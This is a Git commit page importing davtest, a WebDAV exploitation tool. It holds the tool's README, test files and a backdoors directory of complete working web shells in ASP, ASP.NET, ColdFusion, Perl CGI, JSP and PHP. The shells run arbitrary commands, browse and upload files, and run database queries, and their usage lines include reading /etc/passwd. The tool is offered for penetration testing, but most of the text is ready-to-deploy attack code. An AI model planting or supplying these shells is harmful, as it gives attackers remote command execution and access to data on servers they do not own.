Commit a146b4b5 authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 1.0

parents
This diff is collapsed.
#############################################################
Copyright 2010 Sunera, LLC.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Author: Chris Sullo / csullo [at] sunera . com
#############################################################
About
This program attempts to exploit WebDAV enabled servers by:
- attempting to create a new directory (MKCOL)
- attempting to put test files of various programming langauges (PUT)
- optionally attempt to put files with .txt extension, then move to executable (MOVE)
- check if files executed or were uploaded properly
- optionally upload a backdoor/shell file for languages which execute
Additionally, this can be used to put an arbitrary file to remote systems.
#############################################################
Requirements
The following PERL modules are required from cpan.org:
HTTP::DAV
Getopt::Long
#############################################################
Options
davtest.pl -url url [options]
-auth+ Authorization like user:password. Supports Basic and Digest only, no NTLM (yet).
-cleanup Delete everything uploaded except backdoor/shell files
-directory+ Postfix of directory to create. This is always prefixed by 'DavTestDir_' and if not specified
is set to a random string.
-debug+ HTTP::DAV debug level 1-3. Levels 2 and 3 log request/responses to /tmp/perldav_debug.txt.
-move PUT files as .txt and then try to MOVE them to the executable file extension
-nocreate Don't create a directory, work at the -url level.
-quiet Only print out summary and serious (usually fatal) errors.
-random name+ Use this string instead of a random string for filenames.
-sendbd+ Send backdoor files (from backdoors/ directory). See each script's source for how to use it, if
it's not immediately obvious.
auto - for any succeeded test
ext - extension matching file name(s) in backdoors/ dir
-uploadfile+ Upload this file to to the server. This option requires -uploadloc to specify the remote location.
-uploadloc+ Upload -uploadfile to this location/name. This option requires -uploadfile.
-url+ Url of the DAV location.
#############################################################
Test Files
Tests are used to determine if the server can execute a certain type of code. Each test may have a
corresponding backdoor file, but backdoor files *must* have a corresponding test to determine if
that file type can execute on the server. It is recommended a simple/basic operation for each language
is used--by default, the supplied tests use mathematical calculations, if possible.
Test files are located in the 'test/' directory. Files must be named according to
the type of program file they will become on the server. For example, a file named 'php.txt'
will be put to the server with a .php extension.
Each file must have two lines, 'content' and 'execmatch'--the body put to the server and regex to
match to see if it executed. For example, the php.txt contents are:
content=<?php print 7.8 * 6.4;?>
execmatch=49.92
Additionally, the token $$FILENAME$$ will be replaced (with the PUT file's name) in the content before
it sent to the server. Embedded newlines (\n) will be converted to actual newlines (to accommodate PERL).
#############################################################
Backdoor files
Backdoor files are located in the 'backdoors/' directory. They must have the match extension for the type
they will be uploaded for. For example, a php backdoor must have a '.php' extension.
A backdoor file can contain any code you desire, and multiple backdoor files may be used for a file type.
If multiple files exist for a type, each will be uploaded when appropriate.
A backdoor type (e.g., php) *must* have a corresponding type in the 'tests/' directory, otherwise it will
never be tested/uploaded.
#############################################################
Examples
Example: Test file uploads at this location url:
davtest.pl -url http://localhost/davdir
Example: Test file uploads at this location url and send backdoors for any that succeed:
davtest.pl -url http://localhost/davdir -sendbd auto
Example: Upload a file using authentication, send the perl_cmd.pl backdoor and call it perl.pl on the server:
davtest.pl -url http://localhost/davdir -auth user:pass -uploadfile backdoors/perl_cmd.pl -uploadloc perl.pl
#############################################################
TODO:
- NTLM authentication
- Backdoors for more languages
- Validate jhtml test syntax
These backdoors/shells are mostly from Michael Daw's excellent "Web Backdoor Compilation" which can be
found at http://michaeldaw.org/projects/web-backdoor-compilation.
To enable a new backdoor file for upload, simple drop it here and make sure the extension matches
whichever type of language it is. For example, a JSP backdoor should be named... something.jsp.
If multiple files are present for a language, they will all be uploaded when appropriate.
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<!-- http://michaeldaw.org 2006 -->
\ No newline at end of file
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
\ No newline at end of file
<html>
<body>
<!-- Contributed by Kurt Grutzmacher () -->
Notes:<br><br>
<ul>
<li>Prefix DOS commands with "c:\windows\system32\cmd.exe /c &lt;command&gt;" or wherever cmd.exe is<br>
<li>Options are, of course, the command line options you want to run
<li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
</ul>
<p>
<cfoutput>
<table>
<form method="POST" action="cfexec.cfm">
<tr><td>Command:</td><td><input type=text name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse>value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</FORM>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfif>
</cfoutput>
</body>
</html>
<!-- Contributed by Kurt Grutzmacher (http://grutz.jingojango.net/exploits/) -->
<!-- http://michaeldaw.org 04/2007 -->
\ No newline at end of file
#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
print "<html><body>";
print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
if (!$req) {
print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
}
else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
# <!-- http://michaeldaw.org 2006 -->
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->
\ No newline at end of file
#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
print "<html><body>";
print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
if (!$req) {
print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
}
else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
# <!-- http://michaeldaw.org 2006 -->
<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
print "<pre>";
fpassthru($file);
print "</pre>";
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
$files = array();
echo "<h2>listing of $d</h2><hr>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) $type="dir";
else $type="file";
$files[$dir]=$type;
}
ksort($files);
foreach ($files as $f=>$t) {
if ($t == "dir") {
echo "<a href='$PHP_SELF?d=$d/$f'><font color=grey>$f/</font></a><br />";
}
else {
echo "<a href='$PHP_SELF?f=$d/$f'><font color=black>$f</font></a><br />";
}
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], "$dir$fname"))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
$curdir = getcwd();
print "Current directory is: $curdir<br />";
if (preg_match("/^[a-zA-Z]:\//", $curdir, $match)) {
print "Browse: <a href=\"?d=$match[0]\">/</a><br />";
}
else {
print "Browse: <a href=\"?d=/\">/</a><br />";
}
print "Browse: <a href=\"?d=$curdir\">$curdir</a><br /><hr>";
?>
<br />
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<br />
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>
<br />
To browse:<br />
<hr>
<br />
Execute mysql query:
<br />
<br />
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost">
<br />
user: <input type="text" name="usr" value=root>
<br />
password: <input type="text" name="passwd">
<br />
database: <input type="text" name="db">
<br />
query: <input type="text" name="mquery">
<br />
<input type="submit" value="execute">
</form>
<!-- http://michaeldaw.org 2006 -->
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
This diff is collapsed.
To enable a new test file for upload, simple drop it here and make sure the file name is ext.txt,
whichever type of language it is. For example, a JSP test should be named... jsp.txt.
content=<html><body><% response.write (7.8 * 6.4) %>
execmatch=49.92
content=<html><body><% response.write (7.8 * 6.4) %>
execmatch=49.92
content=<cfscript>WriteOutput(7.8*6.4);</cfscript>
execmatch=49.92
content=#!/usr/bin/perl\nprint 'Content-Type: text/html\n\r\n\r' . 7.8 * 6.4;
execmatch=49.92
content=HTML put via davtest<br />
execmatch=HTML put via davtest
# This is a complete guess as to syntax
content=<%= System.out.println(7.8 * 6.4); %>
execmatch=49.92
content=<%= System.out.println(7.8 * 6.4); %>
execmatch=49.92
content=<?php print 7.8 * 6.4;?>
execmatch=49.92
content=#!/usr/bin/perl\nprint 'Content-Type: text/html\n\r\n\r' . 7.8 * 6.4;
execmatch=49.92
content=<!--#config timefmt="%Y" -->YEAR:<!--#flastmod file="$$FILENAME$$"-->:YEAR<br />EXEC ls:<!--#exec cmd="ls -al"-->:EXEC ls<br />EXEC dir:<!--#exec cmd="dir"-->:EXEC dir
execmatch=YEAR\:[0-9]{4}\:YEAR
content=TXT put via davtest
execmatch=TXT put via davtest
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment